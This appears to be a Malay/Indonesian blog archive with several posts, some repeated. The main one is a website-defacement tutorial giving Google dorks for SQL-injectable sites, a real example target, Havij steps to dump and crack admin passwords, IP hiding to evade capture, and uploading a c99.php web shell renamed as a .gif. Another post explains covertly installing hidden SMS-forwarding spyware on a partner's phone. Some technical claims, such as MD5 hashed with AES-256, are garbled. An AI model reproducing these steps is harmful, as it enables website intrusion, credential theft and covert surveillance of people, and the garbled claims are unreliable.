Sabtu, 23 Februari 2013
Sabtu, 15 Desember 2012
Jumat, 09 November 2012
Deface
Assalamualaikum,pada kali ini saya akan
tunjukkan cara bagaimana hendak mendefaced sesebuah laman web dengan
menggunakan cara SQL Injection untuk mendapatkan admin
password..baiklah,saya akan tunjukkan satu persatu caranya...
Sebelum itu,kamu harus ada ilmu mengenai defaced,IP ADDRESS dan SQL Injection (PENTING!!):-
APAKAH ITU DEFACED:
Defaced ialah perbuatan merubah paparan utama sesebuah website.Paparan utama dipanggil shell.Shell ialah satu kode atau aturcara yang sudah diprogramkan dalam bentuk laman web untuk ditunjukkan kepada sesiapa yang melayari web tersebut.Defaced ialah satu kerja jahat (^_^) menggantikan kode asal kepada kode yang diinginkan oleh penggodam.Selepas kode itu digantikan,sesiapa sahaja yang melayari laman web itu akan melihat paparan yang diubah oleh penggodam.Untuk melakukan perkara ini,kamu harus mencipta satu shell dalam extension (".htm" atau ".html") ataupun anda boleh copy shell ini daripada laman web yang telah didefaced dan hanya menukar sedikit sahaja kandungan dalam shell itu.
APAKAH ITU SQL INJECTION:-
SQL Injection ialah satu cara untuk kita memecah masuk pangkalan data (database) sesebuah website bertujuan mencuri data dan nama pengguna dan juga password.SQL Injection ialah kaedah memecah masuk yang paling berkesan sekali berbanding XXS Cross dan PHP Injection.Asalnya,SQL Injection harus dilakukan dengan cara manual iaitu memasukkan kode kedalam URL ataupun dipanggil UNION.Kode ini sangat susah dan ramai penggodam baru (newbies) tidak dapat menghafal kode ini secara menyeluruh.Tetapi,banyak tool yang telah direka bagi memudahkan penggodam memecah masuk pangkalan data.Antara alatan yang popular untuk melakukan SQL Injection ialah Havij dan SQLi Helper.
APAKAH ITU IP ADDRESS:-
IP Address ialah pengenalan kepada komputer yang menggunakan Internet.IP address terdapat maklumat mengenai lokasi di mana sesebuah komputer bersambung kepada Internet.Ia sama seperti kad pengenalan,begitulah juga IP Address.
TOOL YANG HARUS KAMU ADA:-
(1).Havij 1.15 atau versi lain..
KEGUNAAN : Untuk melakukan SQL Injection ke sesebuah website
DOWNLOAD LINK : www.mediafire.com/?mroimwseopfoc2w
(2).SUPER IP HIDE 3.0 atau versi lain..
KEGUNAAN : Untuk menyembunyikan IP kamu semasa kamu melakukan SQL Injection atau melogin sebagai ADMIN...
DOWNLOAD LINK : www.mediafire.com/?dy02ygzntasteiv
(3).C99.PHP
KEGUNAAN : Digunakan untuk merubah kode shell yang terdapat di dalam sesuatu website..
DOWNLOAD LINK : www.mediafire.com/?ko0hnzdoywt
Baiklah,itulah tool yang mesti kamu ada.Kedua-dua tool ini penting terutama SUPER IP HIDE kerana tool itu berfungsi menyembunyikan IP kamu.Kalau kamu tidah mempunya tool itu,kamu akan ditangkap kerana admin server itu mengesan kamu dengan mudah kerana kamu tidak menyembunyikan IP kamu..
Baiklah,sekarang kita mesti mencari laman web yang security lemah atau lebih dipanggil website yang vulneberity(dalam bahasa Inggeris) untuk dilakukan defacement.Terdapat langkah yang mudah untuk mencari website yang vuln(singkatan vulneberity).Iaitu menggunakan "google dork","google dork" ialah salah satu kemudahan diberi google untuk mencari website yang penting.Tetapi,kita boleh menyalahgunakan kelebihan itu untuk mencari website yang vuln.Caranya seperti begini:-
(1).Buka "www.google.com"
(2).Taip salah satu kode di bawah ini
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
(3).Tekan search
(4).Akan keluar beratus-ratus website yang vuln.
(5).Pilih salah satu.
Cuba buka laman yang anda pilih itu,anda pasti lihat error yang berlaku seperti "Warning: mysql_fetch_assoc()" atau "Warning: mysql_fetch_array()".Itu maknanya security website ini masih lemah dan berupaya untuk didefacedkan.Contohnya saya mendapat web seperti ini:-
http://www.ypages.in/sell_offers.php?cid=28
Untuk kita mengdefaced laman web tersebut.Kita harus menyamar sebagai admin dan sebagai admin,tidak akan ada sekatan lagi untuk kita lakukan apa sahaja di website itu.Dan untuk mencari kata pengguna admin dan juga password,kita harus memecah masuk kedalam pangkalan data website berkenaan.Sebenarnya error yang kita cari sebentar tadi ialah pintu masuk kedua ataupun dipanggil "backdoor" dalam sesebuah website.Error tersebut akan memudahkan kita melakukan SQL Injection berbanding melakukan di page yang tidak mempunyai error.Antara alatan kesukaan saya untuk memecah masuk database ialah Havij,Havij sangat terkenal di kalangan penggodam kerana ia memudahkan kerja penggodam bagi melakukan SQL Injection.SEBELUM ANDA MEMULAKAN SQL INJECTION KE SESUATU WEBSITE.PASTIKAN ANDA SUDAH MENYEMBUNYIKAN IP ANDA KERANA APABILA ANDA MELAKUKAN SQL INJECTION,WEBSITE SERVER BOLEH MENGESAN IP ADDRESS ANDA.SAYA TIDAK AKAN BERTANGGUNGJAWAB SEKIRANYA ANDA DITANGKAP KERANA KECUAIAN ANDA.Caranya melakukan SQL Injection adalah seperti berikut:-
(1).Buka Havij
(2).Masukkan alamat website yang error sebentar lagi.
Contoh : http://www.ypages.in/sell_offers.php?cid=28
(3).Tekan scan.
(4).Tunggu kerana Havij sedang melakukan SQL Injection ke dalam website berkenaan.
Bila anda berjaya,Tables akan diunlockkan,di situ,anda boleh mencuri admin username dan password.TETAPI,jika anda tidak berjaya,cari target lain kerana website itu mungkin sudah diupgradekan pangkalan datanya dan sukar untuk kita memecah masuk pangkalan datanya.Dan apabila berjaya,pergi ke "Tables",di situ keluar fail yang mana fail itu ialah "DataBase".Katakanlah fail itu bernama "ID_INFORMATION",maka click pada kotak itu.Selepas itu tekan "Get Tables",ia akan mencari table yang wujud dalam database itu,selepas semua table sudah habis discan oleh Havij,cari nama tables yang merujuk nama username atau admin.Kerana kebiasaan di dalam table itulah kata nama dan kata laluan Admin disimpan.Jika anda melihat table yang aneh seperti "admin" atau "username_info"..click pada kotak itu,selepas itu,tekan "Get Colums"..ia akan muncul fail-fail yang mungkin menyimpan data bagi admin username dan password..andainya terdapat dua colum iaitu "username" dan "password"..click pada kedua-dua fail tersebut..click "Get Data"..ia akan keluar username dan password...itulah username dengan password admin..tetapi,andai jika anda scan,terdapat banyak username dengan password yang keluar,pilih username yang tertulis admin..itulah username dan password admin yang sebenar..Tetapi,andai kata nama admin muncul,tetapi passwordnya dalam bentuk yang pelik.Iaitu password yang mempunyai 32 huruf.Itu adakah password hash.Ia telah dihashkan bagi menyukarkan penggodam mendapat password yang benar-benar betul.Contohnya passwordnya dalam bentuk begini :-
Contoh Password:-
098F6BCD4621D373CADE4E832627B4F6
Ini dipanggil MD5 hash.MD5 hash sangat terkenal sekali kerana banyak digunakan oleh web server bagi menyembunyikan password mereka walaupun database mereke dipecah masuk oleh penggodam.Password itu telah dihashkan begini:-
Contoh:-
test (password sebenar) ---------> 098F6BCD4621D373CADE4E832627B4F6 (telah dihashkan)
Tetapi,tidak mengapa.Di dalam Havij,terdapat tool yang membolehkan kita memecah password hash itu.Begini caranya:-
(1).Buka Havij
(2).Pergi ke "MD5"
(3).Masukkan hash MD5 tadi.
(4).Tekan "start"
(5).Lihat passwordnya.
Tetapi,jika kamu tidak berjaya ataupun failed dalam memecahkan password itu.Mungkin terdapat beberapa sebab.Mungkin MD5 itu telah dihashkan dalam bentuk AES-256.AES-256 ialah bentuk penyimpan password security yang paling selamat dan sukar dihash.Ia hanya boleh dihash menggunakan tool "Cain and Abel".Kedua,mungkin password asal yang belum dihash itu terdapat dalam digit yang panjang,seperti contoh yang saya tunjuk tadi iaitu "test".Ia hanya 4 digit,password yang senang untuk dicrack ialah 8 digit sahaja.Itu pun bergantung kepada security MD5 itu.Jika password asal digitnya lebih daripada 9.Ia sukar dihash dan hanya boleh dihash dengan menggunakan Rainbow Table.Rainbow table ialah satu "table" yang digunakan oleh "Cain and Abel" untuk menggunakan kaedah cryptology untuk memecah kod tersebut.Rainbow Table boleh didownload tetapi saiznya di luar jangkaan kita,iaitu 50-300 GB.Kita juga boleh menghasilkan sendiri Rainbow Table tetapi ia mengambil masa sehingga 10 tahun untuk siap.Ketiga,mungkin hash tersebut bukan MD5,mungkin MD2 atau MD4.Terdapat banyak hash yang ada sekarang.Kalau kamu mempunyai masalah password dalam bentuk MD5 hash.Saya sarankan kamu mengambil target lain kerana kita akan membuang masa sahaja untuk memecah password itu melainkan itu website yang sudah kamu target sejak dahulu sekali.Saya tidak akan menghalang kamu.Sekarang kita kembali ke agenda kita,iaitu mendefacedkan website.
Sekarang tugas sebenar ialah mendefaced laman web berkenaan.Perkara pertama ialah kamu harus memecah masuk ke dalam admin website itu dengan menggunakan username dan password yang kamu dapat semasa melakukan SQL Injection.Kebiasaan,untuk melogin kedalam website,anda harus menambah "/admin" kebelakang nama website tersebut.Contohnya:-
www.example.com/admin
Tetapi,jika page itu tidak wujud.Maka admin login page mungkin telah disembunyikan dengan nama yang lain selain admin.Andai berlaku kejadian itu,Havij ialah alat yang sempurna sekali untuk mengesan admin login page yang terdapat dalam laman web berkenaan.Caranya begini:-
(1).Pergi ke Find Admin
(2).Masukkan laman web berkenaan (Contohnya:www.example.com)
(3).Tekan start.Ia akan mula mencari admin login page dalam laman web berkenaan
(4).Bila sudah habis scan,buka URL berkenaan.
Masukkan username dengan password.Bila berjaya masuk,anda berupaya melihat segala fail sulit atau e-mail sulit yang terdapat dalam website berkenaan.Tetapi,tujuan kita ialah mendefaced,jadi kita beralih kepada agenda kita.Untuk mendefaced,seperti saya sebutkan sebentar tadi,kita gunakan shell "c99.php" sebagai shell utama kita hendak mendefaced web berkenaan.Cari apa-apa yang ditulis dalam website berkenaan upload.Jika terdapat butang yang membolehkan kita mengupload shell,ia akan memudahkan kerja kita.Tetapi,jika tak terdapat butang yang membenarkan kita mengupload shell.Kita harus "menipu" laman web berkenaan.Cari lagi butang yang membolehkan kita menguploadkan fail,selalunya admin hanya dibenarkan mengupload gambar sahaja.Tetapi,tidak mengapa.Rename kembali shell "c99.php" anda kepada "c99.php.gif".Ini akan menipu laman web berkenaan kerana laman web berkenaan akan menganggap kita cuma mengupload gambar sahaja tetapi kita sudah mengupload shell ke website berkenaan.Buka shell berkenaan,contohnya:-
www.example.com/c99.php.gif (mengikut kepada apa extension yang anda tukar)
Bila anda buka c99.php,ia akan keluar satu page yang membolehkan kita mengawal web itu lebih daripada admin tersebut.Ia membolehkan kita mengedit,menukar dan memadam shell yang terdapat dalam website berkenaan.Tujuan kita adalah mengdefaced website berkenaan.Oleh itu,kita akan mengedit shell yang terdapat dalam website itu.Cari apa-apa shell yang mungkin bernama "index.php" atau "main.php".Cari apa-apa sahaja shell yang mungkin paparan utama website berkenaan.Contohnya,"index.php" ialah paparan utama yang keluar apabila kita membuka website berkenaan.Jadi,shell itulah yang kita akan edit.Tekan pada "index.php" berkenaan.Akan keluar kode yang terdapat dalam shell itu,padam semua kode itu,gantikannya dengan kode shell kita.Tekan save.Sekarang.Anda telah berjaya.Cuba taip website itu untuk melihat ia berjaya atau tidak.Kalau ia berjaya,ia akan keluar paparan yang kita sudah programkan ke dalam wesite itu.
Sebelum itu,kamu harus ada ilmu mengenai defaced,IP ADDRESS dan SQL Injection (PENTING!!):-
APAKAH ITU DEFACED:
Defaced ialah perbuatan merubah paparan utama sesebuah website.Paparan utama dipanggil shell.Shell ialah satu kode atau aturcara yang sudah diprogramkan dalam bentuk laman web untuk ditunjukkan kepada sesiapa yang melayari web tersebut.Defaced ialah satu kerja jahat (^_^) menggantikan kode asal kepada kode yang diinginkan oleh penggodam.Selepas kode itu digantikan,sesiapa sahaja yang melayari laman web itu akan melihat paparan yang diubah oleh penggodam.Untuk melakukan perkara ini,kamu harus mencipta satu shell dalam extension (".htm" atau ".html") ataupun anda boleh copy shell ini daripada laman web yang telah didefaced dan hanya menukar sedikit sahaja kandungan dalam shell itu.
APAKAH ITU SQL INJECTION:-
SQL Injection ialah satu cara untuk kita memecah masuk pangkalan data (database) sesebuah website bertujuan mencuri data dan nama pengguna dan juga password.SQL Injection ialah kaedah memecah masuk yang paling berkesan sekali berbanding XXS Cross dan PHP Injection.Asalnya,SQL Injection harus dilakukan dengan cara manual iaitu memasukkan kode kedalam URL ataupun dipanggil UNION.Kode ini sangat susah dan ramai penggodam baru (newbies) tidak dapat menghafal kode ini secara menyeluruh.Tetapi,banyak tool yang telah direka bagi memudahkan penggodam memecah masuk pangkalan data.Antara alatan yang popular untuk melakukan SQL Injection ialah Havij dan SQLi Helper.
APAKAH ITU IP ADDRESS:-
IP Address ialah pengenalan kepada komputer yang menggunakan Internet.IP address terdapat maklumat mengenai lokasi di mana sesebuah komputer bersambung kepada Internet.Ia sama seperti kad pengenalan,begitulah juga IP Address.
TOOL YANG HARUS KAMU ADA:-
(1).Havij 1.15 atau versi lain..
KEGUNAAN : Untuk melakukan SQL Injection ke sesebuah website
DOWNLOAD LINK : www.mediafire.com/?mroimwseopfoc2w
(2).SUPER IP HIDE 3.0 atau versi lain..
KEGUNAAN : Untuk menyembunyikan IP kamu semasa kamu melakukan SQL Injection atau melogin sebagai ADMIN...
DOWNLOAD LINK : www.mediafire.com/?dy02ygzntasteiv
(3).C99.PHP
KEGUNAAN : Digunakan untuk merubah kode shell yang terdapat di dalam sesuatu website..
DOWNLOAD LINK : www.mediafire.com/?ko0hnzdoywt
Baiklah,itulah tool yang mesti kamu ada.Kedua-dua tool ini penting terutama SUPER IP HIDE kerana tool itu berfungsi menyembunyikan IP kamu.Kalau kamu tidah mempunya tool itu,kamu akan ditangkap kerana admin server itu mengesan kamu dengan mudah kerana kamu tidak menyembunyikan IP kamu..
Baiklah,sekarang kita mesti mencari laman web yang security lemah atau lebih dipanggil website yang vulneberity(dalam bahasa Inggeris) untuk dilakukan defacement.Terdapat langkah yang mudah untuk mencari website yang vuln(singkatan vulneberity).Iaitu menggunakan "google dork","google dork" ialah salah satu kemudahan diberi google untuk mencari website yang penting.Tetapi,kita boleh menyalahgunakan kelebihan itu untuk mencari website yang vuln.Caranya seperti begini:-
(1).Buka "www.google.com"
(2).Taip salah satu kode di bawah ini
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
(3).Tekan search
(4).Akan keluar beratus-ratus website yang vuln.
(5).Pilih salah satu.
Cuba buka laman yang anda pilih itu,anda pasti lihat error yang berlaku seperti "Warning: mysql_fetch_assoc()" atau "Warning: mysql_fetch_array()".Itu maknanya security website ini masih lemah dan berupaya untuk didefacedkan.Contohnya saya mendapat web seperti ini:-
http://www.ypages.in/sell_offers.php?cid=28
Untuk kita mengdefaced laman web tersebut.Kita harus menyamar sebagai admin dan sebagai admin,tidak akan ada sekatan lagi untuk kita lakukan apa sahaja di website itu.Dan untuk mencari kata pengguna admin dan juga password,kita harus memecah masuk kedalam pangkalan data website berkenaan.Sebenarnya error yang kita cari sebentar tadi ialah pintu masuk kedua ataupun dipanggil "backdoor" dalam sesebuah website.Error tersebut akan memudahkan kita melakukan SQL Injection berbanding melakukan di page yang tidak mempunyai error.Antara alatan kesukaan saya untuk memecah masuk database ialah Havij,Havij sangat terkenal di kalangan penggodam kerana ia memudahkan kerja penggodam bagi melakukan SQL Injection.SEBELUM ANDA MEMULAKAN SQL INJECTION KE SESUATU WEBSITE.PASTIKAN ANDA SUDAH MENYEMBUNYIKAN IP ANDA KERANA APABILA ANDA MELAKUKAN SQL INJECTION,WEBSITE SERVER BOLEH MENGESAN IP ADDRESS ANDA.SAYA TIDAK AKAN BERTANGGUNGJAWAB SEKIRANYA ANDA DITANGKAP KERANA KECUAIAN ANDA.Caranya melakukan SQL Injection adalah seperti berikut:-
(1).Buka Havij
(2).Masukkan alamat website yang error sebentar lagi.
Contoh : http://www.ypages.in/sell_offers.php?cid=28
(3).Tekan scan.
(4).Tunggu kerana Havij sedang melakukan SQL Injection ke dalam website berkenaan.
Bila anda berjaya,Tables akan diunlockkan,di situ,anda boleh mencuri admin username dan password.TETAPI,jika anda tidak berjaya,cari target lain kerana website itu mungkin sudah diupgradekan pangkalan datanya dan sukar untuk kita memecah masuk pangkalan datanya.Dan apabila berjaya,pergi ke "Tables",di situ keluar fail yang mana fail itu ialah "DataBase".Katakanlah fail itu bernama "ID_INFORMATION",maka click pada kotak itu.Selepas itu tekan "Get Tables",ia akan mencari table yang wujud dalam database itu,selepas semua table sudah habis discan oleh Havij,cari nama tables yang merujuk nama username atau admin.Kerana kebiasaan di dalam table itulah kata nama dan kata laluan Admin disimpan.Jika anda melihat table yang aneh seperti "admin" atau "username_info"..click pada kotak itu,selepas itu,tekan "Get Colums"..ia akan muncul fail-fail yang mungkin menyimpan data bagi admin username dan password..andainya terdapat dua colum iaitu "username" dan "password"..click pada kedua-dua fail tersebut..click "Get Data"..ia akan keluar username dan password...itulah username dengan password admin..tetapi,andai jika anda scan,terdapat banyak username dengan password yang keluar,pilih username yang tertulis admin..itulah username dan password admin yang sebenar..Tetapi,andai kata nama admin muncul,tetapi passwordnya dalam bentuk yang pelik.Iaitu password yang mempunyai 32 huruf.Itu adakah password hash.Ia telah dihashkan bagi menyukarkan penggodam mendapat password yang benar-benar betul.Contohnya passwordnya dalam bentuk begini :-
Contoh Password:-
098F6BCD4621D373CADE4E832627B4F6
Ini dipanggil MD5 hash.MD5 hash sangat terkenal sekali kerana banyak digunakan oleh web server bagi menyembunyikan password mereka walaupun database mereke dipecah masuk oleh penggodam.Password itu telah dihashkan begini:-
Contoh:-
test (password sebenar) ---------> 098F6BCD4621D373CADE4E832627B4F6 (telah dihashkan)
Tetapi,tidak mengapa.Di dalam Havij,terdapat tool yang membolehkan kita memecah password hash itu.Begini caranya:-
(1).Buka Havij
(2).Pergi ke "MD5"
(3).Masukkan hash MD5 tadi.
(4).Tekan "start"
(5).Lihat passwordnya.
Tetapi,jika kamu tidak berjaya ataupun failed dalam memecahkan password itu.Mungkin terdapat beberapa sebab.Mungkin MD5 itu telah dihashkan dalam bentuk AES-256.AES-256 ialah bentuk penyimpan password security yang paling selamat dan sukar dihash.Ia hanya boleh dihash menggunakan tool "Cain and Abel".Kedua,mungkin password asal yang belum dihash itu terdapat dalam digit yang panjang,seperti contoh yang saya tunjuk tadi iaitu "test".Ia hanya 4 digit,password yang senang untuk dicrack ialah 8 digit sahaja.Itu pun bergantung kepada security MD5 itu.Jika password asal digitnya lebih daripada 9.Ia sukar dihash dan hanya boleh dihash dengan menggunakan Rainbow Table.Rainbow table ialah satu "table" yang digunakan oleh "Cain and Abel" untuk menggunakan kaedah cryptology untuk memecah kod tersebut.Rainbow Table boleh didownload tetapi saiznya di luar jangkaan kita,iaitu 50-300 GB.Kita juga boleh menghasilkan sendiri Rainbow Table tetapi ia mengambil masa sehingga 10 tahun untuk siap.Ketiga,mungkin hash tersebut bukan MD5,mungkin MD2 atau MD4.Terdapat banyak hash yang ada sekarang.Kalau kamu mempunyai masalah password dalam bentuk MD5 hash.Saya sarankan kamu mengambil target lain kerana kita akan membuang masa sahaja untuk memecah password itu melainkan itu website yang sudah kamu target sejak dahulu sekali.Saya tidak akan menghalang kamu.Sekarang kita kembali ke agenda kita,iaitu mendefacedkan website.
Sekarang tugas sebenar ialah mendefaced laman web berkenaan.Perkara pertama ialah kamu harus memecah masuk ke dalam admin website itu dengan menggunakan username dan password yang kamu dapat semasa melakukan SQL Injection.Kebiasaan,untuk melogin kedalam website,anda harus menambah "/admin" kebelakang nama website tersebut.Contohnya:-
www.example.com/admin
Tetapi,jika page itu tidak wujud.Maka admin login page mungkin telah disembunyikan dengan nama yang lain selain admin.Andai berlaku kejadian itu,Havij ialah alat yang sempurna sekali untuk mengesan admin login page yang terdapat dalam laman web berkenaan.Caranya begini:-
(1).Pergi ke Find Admin
(2).Masukkan laman web berkenaan (Contohnya:www.example.com)
(3).Tekan start.Ia akan mula mencari admin login page dalam laman web berkenaan
(4).Bila sudah habis scan,buka URL berkenaan.
Masukkan username dengan password.Bila berjaya masuk,anda berupaya melihat segala fail sulit atau e-mail sulit yang terdapat dalam website berkenaan.Tetapi,tujuan kita ialah mendefaced,jadi kita beralih kepada agenda kita.Untuk mendefaced,seperti saya sebutkan sebentar tadi,kita gunakan shell "c99.php" sebagai shell utama kita hendak mendefaced web berkenaan.Cari apa-apa yang ditulis dalam website berkenaan upload.Jika terdapat butang yang membolehkan kita mengupload shell,ia akan memudahkan kerja kita.Tetapi,jika tak terdapat butang yang membenarkan kita mengupload shell.Kita harus "menipu" laman web berkenaan.Cari lagi butang yang membolehkan kita menguploadkan fail,selalunya admin hanya dibenarkan mengupload gambar sahaja.Tetapi,tidak mengapa.Rename kembali shell "c99.php" anda kepada "c99.php.gif".Ini akan menipu laman web berkenaan kerana laman web berkenaan akan menganggap kita cuma mengupload gambar sahaja tetapi kita sudah mengupload shell ke website berkenaan.Buka shell berkenaan,contohnya:-
www.example.com/c99.php.gif (mengikut kepada apa extension yang anda tukar)
Bila anda buka c99.php,ia akan keluar satu page yang membolehkan kita mengawal web itu lebih daripada admin tersebut.Ia membolehkan kita mengedit,menukar dan memadam shell yang terdapat dalam website berkenaan.Tujuan kita adalah mengdefaced website berkenaan.Oleh itu,kita akan mengedit shell yang terdapat dalam website itu.Cari apa-apa shell yang mungkin bernama "index.php" atau "main.php".Cari apa-apa sahaja shell yang mungkin paparan utama website berkenaan.Contohnya,"index.php" ialah paparan utama yang keluar apabila kita membuka website berkenaan.Jadi,shell itulah yang kita akan edit.Tekan pada "index.php" berkenaan.Akan keluar kode yang terdapat dalam shell itu,padam semua kode itu,gantikannya dengan kode shell kita.Tekan save.Sekarang.Anda telah berjaya.Cuba taip website itu untuk melihat ia berjaya atau tidak.Kalau ia berjaya,ia akan keluar paparan yang kita sudah programkan ke dalam wesite itu.
Senin, 05 November 2012
(INTERNET) Cara Copy Paste (Copas) Tulisan Yang dikunci di Blog dengan Mozilla Firefox
Kali ini saya ingin memberikan sedikit tips agar bisa menyalin tulisan yang anda perlukan dari suatu blog tanpa harus mengetik ulang. postingan ini bukan untuk melegalkan pembajakan, hanya sebagai pembelajaran dan tips barangkali ada suatu keperluan mendesak misalnya deadline buat Makalah (True Story), atau lainnya
oke langsung saja.
Misalnya saya kasih contoh situs http://www.anneahira.com/ yang men-disable copy paste di tulisannya, kenapa Anne Ahira, karena saya nge-fans sama ibuk ni, dulu pernah pengen masuk Asian Brain, dana tidak cukup (kenapa malah Curhat, hadeeh)
Langsung saja kita cek ke TKP, saya masuk ke halaman INI. berikut penampakannya :
Langkah-langkah Copy Paste (Copas) Tulisan Yang dikunci di Blog
Demikian tips ini semoga bermanfaat, sekali lagi, tips ini bukan bermaksud untuk melegalkan pembajakan.
semoga bermanfaat!
oke langsung saja.
Misalnya saya kasih contoh situs http://www.anneahira.com/ yang men-disable copy paste di tulisannya, kenapa Anne Ahira, karena saya nge-fans sama ibuk ni, dulu pernah pengen masuk Asian Brain, dana tidak cukup (kenapa malah Curhat, hadeeh)
Langsung saja kita cek ke TKP, saya masuk ke halaman INI. berikut penampakannya :
Langkah-langkah Copy Paste (Copas) Tulisan Yang dikunci di Blog
- Pilih dan Klik Tools -> Options
- Kemuadian klik Content dan Hilangkan Ketiga Centangnya, Perhatikan Gambar!
- Sehingga Menjadi Seperti Ini, Kemudian Klik OK
- Setelah Selesai Reload/Refresh Page/Halaman Tadi
- Sekarang Proses Akhir, Block Seperti Biasa Tulsan yang ada di artikel Tersebut, klik kanan dan Copy
- Untuk mengembalikan pengaturan Mozilla Firefox seperti semula, ikuti langkah-langkah yg tadi, kemudian centang kembali 3 pilihan yang tadi. perhatikan gambar!
Demikian tips ini semoga bermanfaat, sekali lagi, tips ini bukan bermaksud untuk melegalkan pembajakan.
semoga bermanfaat!
Sabtu, 07 April 2012
Remove Timeline The Easy Way
Ever since Timeline appeared on Facebook there have been problems for Mafia Wars players. I’ve been sent many programs that claim to remove it and so far none of them have been easy to use. Today I tried a program called Timeline Remove. I was amazed at how easy it was and it really worked! Keep reading to learn how you can remove your Timeline or view profiles that have it in the old format.
A while ago, I added Timeline to one of my alternate accounts so I’ve experienced first hand how difficult it has been when it comes to Mafia Wars requests. As stated in a previous posts, in order to get your requests into the newsfeeds, you need to go into the Activity Log and add Mafia Wars (1),(2). You also need to write something on every generated request before you publish it and those are two things that many players don’t know they are suppose to do or simply don’t bother doing them.
To get the Facebook account that you are used to back, follow the instructions below.
1. Go to timelineremove.com.
2. Scroll to the bottom of the page and select your browser. The icon of the browser you are using will appear larger than the others. I use Chrome so the rest of the instructions will follow what you see if you are in the Chrome browser. The other browser are very similar and shouldn’t be hard to figure out.
3. Look to the bottom left of your screen for the extension notification and click on “Continue”.
4. Wait for the installation process to complete.
5. Click the “Install” confirmation.
6. You may or may not need to restart your browser.
7. If you did everything right, you will see the Timeline Remove icon in the upper right corner of your screen.
8. Now just go to your Facebook account and everything will be back to normal!
To disable or remove this extension, go to your tools/extension manager.
It’s important to know that this only works locally on the computer you used to download. You will see your profile in the old format but others won’t (unless they have the program activated as well). Facebook does not condone programs that alter it’s appearance and could prevent this program from working at anytime.
Thanks to everyone who posted this valuable information on the Mafia Wars Loot Lady Fan Page and to David Sutton for reminding me to write this post and to Brandon Venery for some technical insight.
A while ago, I added Timeline to one of my alternate accounts so I’ve experienced first hand how difficult it has been when it comes to Mafia Wars requests. As stated in a previous posts, in order to get your requests into the newsfeeds, you need to go into the Activity Log and add Mafia Wars (1),(2). You also need to write something on every generated request before you publish it and those are two things that many players don’t know they are suppose to do or simply don’t bother doing them.
To get the Facebook account that you are used to back, follow the instructions below.
1. Go to timelineremove.com.
2. Scroll to the bottom of the page and select your browser. The icon of the browser you are using will appear larger than the others. I use Chrome so the rest of the instructions will follow what you see if you are in the Chrome browser. The other browser are very similar and shouldn’t be hard to figure out.
3. Look to the bottom left of your screen for the extension notification and click on “Continue”.
4. Wait for the installation process to complete.
5. Click the “Install” confirmation.
6. You may or may not need to restart your browser.
7. If you did everything right, you will see the Timeline Remove icon in the upper right corner of your screen.
8. Now just go to your Facebook account and everything will be back to normal!
To disable or remove this extension, go to your tools/extension manager.
It’s important to know that this only works locally on the computer you used to download. You will see your profile in the old format but others won’t (unless they have the program activated as well). Facebook does not condone programs that alter it’s appearance and could prevent this program from working at anytime.
Thanks to everyone who posted this valuable information on the Mafia Wars Loot Lady Fan Page and to David Sutton for reminding me to write this post and to Brandon Venery for some technical insight.
Minggu, 18 Maret 2012
Cara mudah menyadap SMS dari ponsel anda
ini adalah trik untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh.
hehehehehehe .
oke langsung saja.
syarat:
# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis
hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis
Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
1. download smsanywherelite.sis untuk software menyadap.
direct link :
http://7c3e65c9.linkbucks.com/?lurl=http%3A%2F%2Fwww.wireless-labs.com%2Fdownload%2FSmsAnywhere_S60_2_0_v_1_4_1.SIS
kalau tidak bisa disitu, silahkan download di :
http://www.ziddu.com/download/3233238/smsanywherelite_s60_2_0_v_1_1_0.sis.zip.html
2. Masukkan aplikasi symbian itu di HP anda dan korban
3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
4. Siapkan hp/ponsel korban anda
5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
